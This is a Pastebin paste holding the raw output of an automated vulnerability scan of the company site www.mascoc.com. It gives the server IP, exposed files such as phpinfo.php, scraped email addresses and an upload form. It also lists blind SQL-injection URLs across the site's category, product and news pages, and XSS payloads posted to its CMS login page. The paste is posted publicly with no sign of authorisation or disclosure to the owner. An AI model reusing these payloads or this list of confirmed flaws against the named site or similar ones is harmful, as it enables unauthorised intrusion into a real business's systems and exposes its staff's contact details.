Guest User

crawling www.mascoc.com

a guest
Oct 24th, 2015
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.76 KB | None | 0 0
  1. ===================================================================================================
  2. | Domain: http://www.mascoc.com/
  3. | Server: Apache
  4. | IP: 82.98.134.88
  5. ===================================================================================================
  6. |
  7. | Directory check:
  8. | [+] CODE: 200 URL: http://www.mascoc.com/cms/
  9. | [+] CODE: 200 URL: http://www.mascoc.com/icons/
  10. ===================================================================================================
  11. |
  12. | File check:
  13. | [+] CODE: 200 URL: http://www.mascoc.com/error_log
  14. | [+] CODE: 200 URL: http://www.mascoc.com/index.cgi
  15. | [+] CODE: 200 URL: http://www.mascoc.com/index.do
  16. | [+] CODE: 200 URL: http://www.mascoc.com/index.cfm
  17. | [+] CODE: 200 URL: http://www.mascoc.com/index.htm
  18. | [+] CODE: 200 URL: http://www.mascoc.com/index.html
  19. | [+] CODE: 200 URL: http://www.mascoc.com/index.html~
  20. | [+] CODE: 200 URL: http://www.mascoc.com/index.html%20
  21. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.bak
  22. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ca
  23. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.cz.iso8859-2
  24. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.de
  25. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.dk
  26. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ee
  27. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.el
  28. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.en
  29. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.et
  30. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.es
  31. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.he.iso8859-8
  32. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.hr.iso8859-2
  33. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.it
  34. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ja.iso2022-jp
  35. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.kr.iso2022-kr
  36. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.lu.utf8
  37. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ltz.utf8
  38. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.nl
  39. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.nn
  40. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.no
  41. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.po.iso8859-2
  42. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.pt
  43. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.pt-br
  44. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.cp-1251
  45. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.cp866
  46. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.iso-ru
  47. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.koi8-r
  48. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.se
  49. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.ru.utf8
  50. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.tw
  51. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.tw.Big5
  52. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.var
  53. | [+] CODE: 200 URL: http://www.mascoc.com/index.jhtml
  54. | [+] CODE: 200 URL: http://www.mascoc.com/index.php
  55. | [+] CODE: 200 URL: http://www.mascoc.com/index.php3
  56. | [+] CODE: 200 URL: http://www.mascoc.com/index.shtml
  57. | [+] CODE: 200 URL: http://www.mascoc.com/index.pl
  58. | [+] CODE: 200 URL: http://www.mascoc.com/index.html.fr
  59. | [+] CODE: 200 URL: http://www.mascoc.com/mailman/listinfo
  60. | [+] CODE: 200 URL: http://www.mascoc.com/phpinfo.php
  61. ===================================================================================================
  62. |
  63. | Check robots.txt:
  64. |
  65. | Check sitemap.xml:
  66. ===================================================================================================
  67. |
  68. | Crawler Started:
  69. | Plugin name: Upload Form Detect v.1.1 Loaded.
  70. | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
  71. | Plugin name: E-mail Detection v.1.1 Loaded.
  72. | Plugin name: FCKeditor upload test v.1 Loaded.
  73. | Plugin name: phpinfo() Disclosure v.1 Loaded.
  74. | Plugin name: Code Disclosure v.1.1 Loaded.
  75. | Plugin name: External Host Detect v.1.2 Loaded.
  76. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  77. | [+] Crawling finished, 72 URL's found!
  78. |
  79. | File Upload Forms:
  80. | [+] Upload Form Found: http://www.mascoc.com/cargar/
  81. |
  82. | Web Backdoors:
  83. |
  84. | E-mails:
  85. | [+] E-mail Found: kevinh@kevcom.com
  86. | [+] E-mail Found: mailman@d448.dinaserver.com
  87. | [+] E-mail Found: license@php.net
  88. | [+] E-mail Found: ventas@mascoc.com
  89. | [+] E-mail Found: ricambi@elevatorisrl.com
  90. | [+] E-mail Found: soporte@mascoc.com
  91. | [+] E-mail Found: info@mascoc.com
  92. | [+] E-mail Found: mike@hyperreal.org
  93. | [+] E-mail Found: webmaster@mascoc.com
  94. |
  95. | FCKeditor File Upload:
  96. |
  97. | PHPinfo() Disclosure:
  98. | [+] phpinfo() page: http://www.mascoc.com/phpinfo.php
  99. | System: Linux d448.dinaserver.com 2.6.32.48-grsec-dh #1 SMP Thu Nov 24 09:29:43 CET 2011 x86_64
  100. | allow_url_fopen: On
  101. | allow_url_include: Off
  102. | disable_functions: <i>no value</i>
  103. | safe_mode: Off
  104. | safe_mode_exec_dir: <i>no value</i>
  105. |
  106. | Source Code Disclosure:
  107. |
  108. | External hosts:
  109. | [+] External Host Found: http://ajax.googleapis.com
  110. | [+] External Host Found: http://maps.google.com
  111. | [+] External Host Found: http://d448.dinaserver.com
  112. | [+] External Host Found: http://www.hardened-php.net
  113. | [+] External Host Found: http://css3-mediaqueries-js.googlecode.com
  114. | [+] External Host Found: http://httpd.apache.org
  115. | [+] External Host Found: http://www.gnu.org
  116. | [+] External Host Found: http://html5shim.googlecode.com
  117. |
  118. | Timthumb:
  119. |
  120. | Ignored Files:
  121. ===================================================================================================
  122. | Dynamic tests:
  123. | Plugin name: Learning New Directories v.1.2 Loaded.
  124. | Plugin name: FCKedior tests v.1.1 Loaded.
  125. | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
  126. | Plugin name: Find Backup Files v.1.2 Loaded.
  127. | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
  128. | Plugin name: Local File Include tests v.1.1 Loaded.
  129. | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
  130. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  131. | Plugin name: Remote File Include tests v.1.2 Loaded.
  132. | Plugin name: SQL-injection tests v.1.2 Loaded.
  133. | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
  134. | Plugin name: Web Shell Finder v.1.3 Loaded.
  135. | [+] 1 New directories added
  136. |
  137. |
  138. | FCKeditor tests:
  139. |
  140. |
  141. | Timthumb < 1.33 vulnerability:
  142. |
  143. |
  144. | Backup Files:
  145. |
  146. |
  147. | Blind SQL Injection:
  148. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=3+AND+1=1
  149. | [+] Keyword: FERGUSON
  150. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=4+AND+1=1
  151. | [+] Keyword: ELEVADORA
  152. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=5+AND+1=1
  153. | [+] Keyword: lavado
  154. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=2+AND+1=1
  155. | [+] Keyword: comerciales
  156. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=3+AND+1=1
  157. | [+] Keyword: MODELO
  158. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=4+AND+1=1
  159. | [+] Keyword: LIFTLUX
  160. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=6+AND+1=1
  161. | [+] Keyword: QUIJADA
  162. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=1+AND+1=1
  163. | [+] Keyword: HOLLAND
  164. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=2+AND+1=1
  165. | [+] Keyword: HOLLAND
  166. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/categorias.php?id=1+AND+1=1
  167. | [+] Keyword: construccion
  168. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=22+AND+1=1
  169. | [+] Keyword: FERGUSON
  170. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/subcategorias.php?s=29+AND+1=1
  171. | [+] Keyword: ELEVADORA
  172. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=74+AND+1=1
  173. | [+] Keyword: CONTENIDO
  174. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=73+AND+1=1
  175. | [+] Keyword: CONTENIDO
  176. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=72+AND+1=1
  177. | [+] Keyword: CONTENIDO
  178. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=20+AND+1=1
  179. | [+] Keyword: Habana
  180. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=21+AND+1=1
  181. | [+] Keyword: conclusi�n
  182. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/noticias.php?id=26+AND+1=1
  183. | [+] Keyword: amilan
  184. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=71+AND+1=1
  185. | [+] Keyword: CONTENIDO
  186. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=29+AND+1=1
  187. | [+] Keyword: CONTENIDO
  188. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=5+AND+1=1
  189. | [+] Keyword: CONTENIDO
  190. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=69+AND+1=1
  191. | [+] Keyword: CONTENIDO
  192. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=70+AND+1=1
  193. | [+] Keyword: CONTENIDO
  194. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=7+AND+1=1
  195. | [+] Keyword: CONTENIDO
  196. | [+] Vul [Blind SQL-i]: http://www.mascoc.com/productos.php?pid=6+AND+1=1
  197. | [+] Keyword: CONTENIDO
  198. |
  199. |
  200. | Local File Include:
  201. |
  202. |
  203. | PHP CGI Argument Injection:
  204. |
  205. |
  206. | Remote Command Execution:
  207. |
  208. |
  209. | Remote File Include:
  210. |
  211. |
  212. | SQL Injection:
  213. |
  214. |
  215. | Cross-Site Scripting (XSS):
  216. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  217. | Post data: &usuario="><script>alert('XSS')</script>&clave=123
  218. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  219. | Post data: &usuario="><IMG SRC="javascript:alert('XSS');">&clave=123
  220. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  221. | Post data: &usuario="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">&clave=123
  222. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  223. | Post data: &usuario="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&clave=123
  224. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  225. | Post data: &usuario="><DIV STYLE="background-image: url(javascript:alert('XSS'))">&clave=123
  226. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  227. | Post data: &usuario="><body onload="javascript:alert('XSS')"></body>&clave=123
  228. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  229. | Post data: &usuario="><table background="javascript:alert('XSS')"></table>&clave=123
  230. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  231. | Post data: &usuario=123&clave="><script>alert('XSS')</script>
  232. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  233. | Post data: &usuario=123&clave="><IMG SRC="javascript:alert('XSS');">
  234. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  235. | Post data: &usuario=123&clave="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  236. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  237. | Post data: &usuario=123&clave="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  238. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  239. | Post data: &usuario=123&clave="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
  240. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  241. | Post data: &usuario=123&clave="><body onload="javascript:alert('XSS')"></body>
  242. | [+] Vul [XSS] http://www.mascoc.com/logincms.php
  243. | Post data: &usuario=123&clave="><table background="javascript:alert('XSS')"></table>
  244. |
  245. |
  246. | Web Shell Finder:
  247. ===================================================================================================
  248. | Static tests:
  249. | Plugin name: Local File Include tests v.1.1 Loaded.
  250. | Plugin name: Remote Command Execution tests v.1.1 Loaded.
  251. | Plugin name: Remote File Include tests v.1.1 Loaded.
  252. |
  253. |
  254. | Local File Include:
  255. |
  256. |
  257. | Remote Command Execution:
  258. |
  259. |
  260. | Remote File Include:
  261. ===================================================================================================
  262. Scan end date: 24-10-2015 23:6:41
  263.  
  264.  
  265.  
  266. HTML report saved in: report/www.mascoc.com.html
Add Comment
Please, Sign In to add comment